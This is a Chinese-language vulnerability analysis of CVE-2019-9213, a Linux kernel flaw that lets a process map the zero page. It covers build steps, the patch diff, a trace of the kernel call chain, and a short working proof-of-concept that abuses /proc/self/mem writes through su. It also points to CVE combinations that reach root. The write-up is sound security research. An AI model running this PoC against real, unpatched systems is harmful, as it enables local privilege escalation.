影响版本:Linux-4.20.14以前(v4.20.14已修补) 5.5分。
测试版本:Linux-4.20.7 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory
编译选项: CONFIG_SLAB=y
General setup
—> Choose SLAB allocator (SLUB (Unqueued Allocator))
—> SLAB
在编译时将.config
中的CONFIG_E1000
和CONFIG_E1000E
,变更为=y。参考
$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.20.7.tar.xz
$ tar -xvf linux-4.20.7.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录:/arch/x86/boot/bzImage。
漏洞描述:mm/mmap.c
中的expand_downwards()
缺乏对mmap最小地址的检查,攻击者可以在没有SMAP保护的情况下利用空指针引用,主要原因是对错误的task进行了capability检查。这个漏洞可以绕过mmap_min_addr
的限制,再配合一个空指针引用就有可能提权。现有两种提权的exp——CVE-2019-9213+cve-2018-5333 和 CVE-2019-9213+CVE-2019-8956 。
补丁:patch 不再调用 security_mmap_addr()
函数,直接和 mmap_min_addr
比较。
diff --git a/mm/mmap.c b/mm/mmap.c
index f901065c4c64c..fc1809b1bed67 100644
--- a/mm/mmap.c
+++ b/mm/mmap.c
@@ -2426,12 +2426,11 @@ int expand_downwards(struct vm_area_struct *vma,
{
struct mm_struct *mm = vma->vm_mm;
struct vm_area_struct *prev;
- int error;
+ int error = 0;
address &= PAGE_MASK;
- error = security_mmap_addr(address);
- if (error)
- return error;
+ if (address < mmap_min_addr)
+ return -EPERM;
/* Enforce stack_guard_gap */
prev = vma->vm_prev;
保护机制:开启SMEP,关闭SMAP/kaslr。
利用总结:利用LD_DEBUG=help /bin/su 1>&%d
命令执行write操作,本来应检测exp的cred,结果错误检测了write进程的cred,就将低地址标记为特权可访问。
测试说明:只有在32位系统下才能成功利用,现有的结合本漏洞利用成功的exp都是32位环境,64位环境不能成功。我编译出v4.20.7的32位版本,能够成功利用。由于64位不成功,我就放弃编译了,直接用xman训练营提供的bzimage环境。
一、漏洞分析
漏洞函数调用链:expand_downwards() -> security_mmap_addr() -> cap_mmap_addr()
int expand_downwards(struct vm_area_struct *vma,
unsigned long address)
{
struct mm_struct *mm = vma->vm_mm;
struct vm_area_struct *prev;
int error;
address &= PAGE_MASK;
error = security_mmap_addr(address); // <---------- 检查权限
if (error)
return error;
...
}
static inline int security_mmap_addr(unsigned long addr)
{
return cap_mmap_addr(addr); // <----------
}
// 这里会判断能否分配低地址,如果通过system()调用 LD_DEBUG=help su 1>&%d 命令执行 write 操作,该函数检测的 current_cred() 就是执行write的进程的cred,而不是vma被改变的进程的cred。由于write操作是root,所以可以通过这个判断。
int cap_mmap_addr(unsigned long addr)
{
int ret = 0;
if (addr < dac_mmap_min_addr) { // dac_mmap_min_addr=0x1000
ret = cap_capable(current_cred(), &init_user_ns, CAP_SYS_RAWIO,
SECURITY_CAP_AUDIT);
/* set PF_SUPERPRIV if it turns out we allow the low mmap */
if (ret == 0)
current->flags |= PF_SUPERPRIV; // 检测通过则标记为有访问权限
}
return ret;
}
write()
函数调用链:mem_write() -> mem_rw() -> access_remote_vm() -> __access_remote_vm() -> get_user_pages_remote() -> __get_user_pages_locked() -> __get_user_pages() -> find_extend_vma() -> expand_stack() -> expand_downwards() -> security_mmap_addr() -> cap_mmap_addr()
Linux对于文件系统通用的结构体是 file_operations ,fs/proc/base.c
中的代码提供与/proc
相关的操作——proc_mem_operations (.write = mem_write
)。这样执行su >&%d < /dev/null
往 /proc/self/mem
写入数据时,实际会调用 mem_write()。
// (1) mem_write()
static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1); // <---------
}
// (2) mem_rw()
static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)
{
... ...
while (count > 0) { // while循环中,如果是写首先通过 copy_from_user() 函数将待写内容buf拷贝到分配的page中,然后调用 access_remote_vm() 函数写入远程进程。读则相反,先调用 access_remote_vm() 函数读取远程进程中的数据,然后调用 copy_to_user() 函数将读取的page拷贝到buf中。
int this_len = min_t(int, count, PAGE_SIZE);
if (write && copy_from_user(page, buf, this_len)) {
copied = -EFAULT;
break;
}
this_len = access_remote_vm(mm, addr, page, this_len, flags); // <-------- 循环调用 access_remote_vm() 来处理远程进程中的数据
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}
if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}
buf += this_len;
addr += this_len;
copied += this_len;
count -= this_len;
}
*ppos = addr;
mmput(mm);
free:
free_page((unsigned long) page);
return copied;
}
// (3) access_remote_vm()
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, unsigned int gup_flags)
{
return __access_remote_vm(NULL, mm, addr, buf, len, gup_flags); // <--------
}
// (4) __access_remote_vm()
int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, unsigned int gup_flags)
{
struct vm_area_struct *vma;
void *old_buf = buf;
int write = gup_flags & FOLL_WRITE;
down_read(&mm->mmap_sem);
/* ignore errors, just check how much was successfully transferred */
while (len) {
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;
ret = get_user_pages_remote(tsk, mm, addr, 1, // <------------- 分析 get_user_pages_remote() 与 get_user_pages() 的区别
gup_flags, &page, &vma, NULL);
if (ret <= 0) {
... ...
} else {
bytes = len;
offset = addr & (PAGE_SIZE-1);
if (bytes > PAGE_SIZE-offset)
bytes = PAGE_SIZE-offset;
maddr = kmap(page);
if (write) {
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);
set_page_dirty_lock(page);
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
kunmap(page);
put_page(page);
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);
return buf - old_buf;
}
// get_user_pages_remote() 与 get_user_pages() 函数(二者区别:是否跨进程)都是 __get_user_pages_locked 函数的封装,作用在于查找并将给定的虚拟地址范围固定到page。之后通过kmap函数将page映射到永久内存映射区,如果是写操作则调用 copy_to_user_page() 函数之后调用 set_page_dirty_lock() 函数将page设置为脏;读操作则调用 copy_from_user_page() 函数。之后调用kunmap函数取消映射。
// (5-1) get_user_pages_remote() —— 这里设置了 FOLL_REMOTE 标志来区分
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *locked)
{
return __get_user_pages_locked(tsk, mm, start, nr_pages, pages, vmas, // <--------
locked,
gup_flags | FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);
// (5-2) get_user_pages()
long get_user_pages(unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas)
{
return __get_user_pages_locked(current, current->mm, start, nr_pages,
pages, vmas, NULL,
gup_flags | FOLL_TOUCH);
}
EXPORT_SYMBOL(get_user_pages);
// (6) __get_user_pages_locked()
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
struct mm_struct *mm,
unsigned long start,
unsigned long nr_pages,
struct page **pages,
struct vm_area_struct **vmas,
int *locked,
unsigned int flags)
{
... ...
pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked); // __get_user_pages(): 将start开始的nr_pages个页固定到pages。返回值(成功固定的页的个数)大于0则说明调用成功,减少 nr_pages 增加 pages_done,nr_pages 为0则退出循环。
if (!locked)
/* VM_FAULT_RETRY couldn't trigger, bypass */
return ret;
/* VM_FAULT_RETRY cannot return errors */
if (!*locked) {
BUG_ON(ret < 0);
BUG_ON(ret >= nr_pages);
}
if (!pages)
/* If it's a prefault don't insist harder */
return ret;
if (ret > 0) {
nr_pages -= ret;
pages_done += ret;
if (!nr_pages)
break;
}
if (*locked) {
/*
* VM_FAULT_RETRY didn't trigger or it was a
* FOLL_NOWAIT.
*/
if (!pages_done)
pages_done = ret;
break;
}
/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
pages += ret;
start += ret << PAGE_SHIFT;
/*
* Repeat on the address that fired VM_FAULT_RETRY
* without FAULT_FLAG_ALLOW_RETRY but with
* FAULT_FLAG_TRIED.
*/
*locked = 1;
lock_dropped = true; // 之后再固定一个页,正常情况下应该返回0退出循环。如果没有退出循环,则nr_pages-1,pages_done+1,start地址加一个PAGE_SIZE重新开始固定。__get_user_pages函数查找vma是通过调用find_extend_vma函数实现的。
down_read(&mm->mmap_sem);
ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
pages, NULL, NULL);
if (ret != 1) {
BUG_ON(ret > 1);
if (!pages_done)
pages_done = ret;
break;
}
nr_pages--;
pages_done++;
if (!nr_pages)
break;
pages++;
start += PAGE_SIZE;
}
if (lock_dropped && *locked) {
/*
* We must let the caller know we temporarily dropped the lock
* and so the critical section protected by it was lost.
*/
up_read(&mm->mmap_sem);
*locked = 0;
}
return pages_done;
}
// (7) __get_user_pages() —— 首先查找vma,调用 follow_page_mask() 函数查询页表获取虚拟地址对应的物理页,如果返回null会调用 faultin_page() 函数。获取到page的指针之后存在pages数组中。
// (8) find_extend_vma() —— __get_user_pages函数查找vma是通过调用find_extend_vma函数实现的。如果vma->vm_start <= addr说明addr在VMA空间范围内;否则说明addr落在空洞中。如果设置了VM_GROWSDOWN标志位调用expand_stack函数扩展vma,内存不足会向低地址进行扩展。漏洞就是没有对扩展后的地址进行合理性校验,缺少 address < mmap_min_addr的判断条件,就可以mmap到NULL地址。
struct vm_area_struct *
find_extend_vma(struct mm_struct *mm, unsigned long addr)
{
struct vm_area_struct *vma;
unsigned long start;
addr &= PAGE_MASK;
vma = find_vma(mm, addr);
if (!vma)
return NULL;
if (vma->vm_start <= addr)
return vma;
if (!(vma->vm_flags & VM_GROWSDOWN))
return NULL;
start = vma->vm_start;
if (expand_stack(vma, addr)) // <---------
return NULL;
if (vma->vm_flags & VM_LOCKED)
populate_vma_page_range(vma, addr, start, NULL);
return vma;
}
// (9) expand_stack()
int expand_stack(struct vm_area_struct *vma, unsigned long address)
{
return expand_downwards(vma, address);
}
总的来说,在最终写入的地址小于vm->start
时,如果设置了 VM_GROWSDOWN
选项的话,就会调用 expand_downwards() 函数扩展vma,内存不足会向低地址进行扩展。漏洞就是没有对扩展后的地址进行合理性校验,缺少 address < mmap_min_addr
的判断条件,就可以mmap到NULL地址。
二、漏洞利用
poc分析:触发漏洞的点在于 su >&%d < /dev/null
向 /proc/self/mem
中写入了数据,写什么数据不重要,(有su就行,读写其它进程的 proc/$pid/mem
需要 PTRACE_ATTACH
权限),重要的是通过它调用write函数。
// poc
void mmap_zero()
{
unsigned long addr = (unsigned long)mmap((void *)0x10000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_ANONYMOUS|MAP_GROWSDOWN|MAP_FIXED, -1, 0);
if (addr != 0x10000)
err(2,"mmap failed");
int fd = open("/proc/self/mem",O_RDWR);
if (fd == -1)
err(2,"open mem failed");
char cmd[0x100] = {0};
sprintf(cmd, "su >&%d < /dev/null", fd);
while (addr)
{
addr -= 0x1000;
if (lseek(fd, addr, SEEK_SET) == -1)
err(2, "lseek failed");
system(cmd);
}
printf("contents:%s\n",(char *)1);
}
参考
CVE-2019-9213——linux内核用户空间0虚拟地址映射漏洞分析
CVE-2019-9213、CVE-2019-8956的分析以及组合提权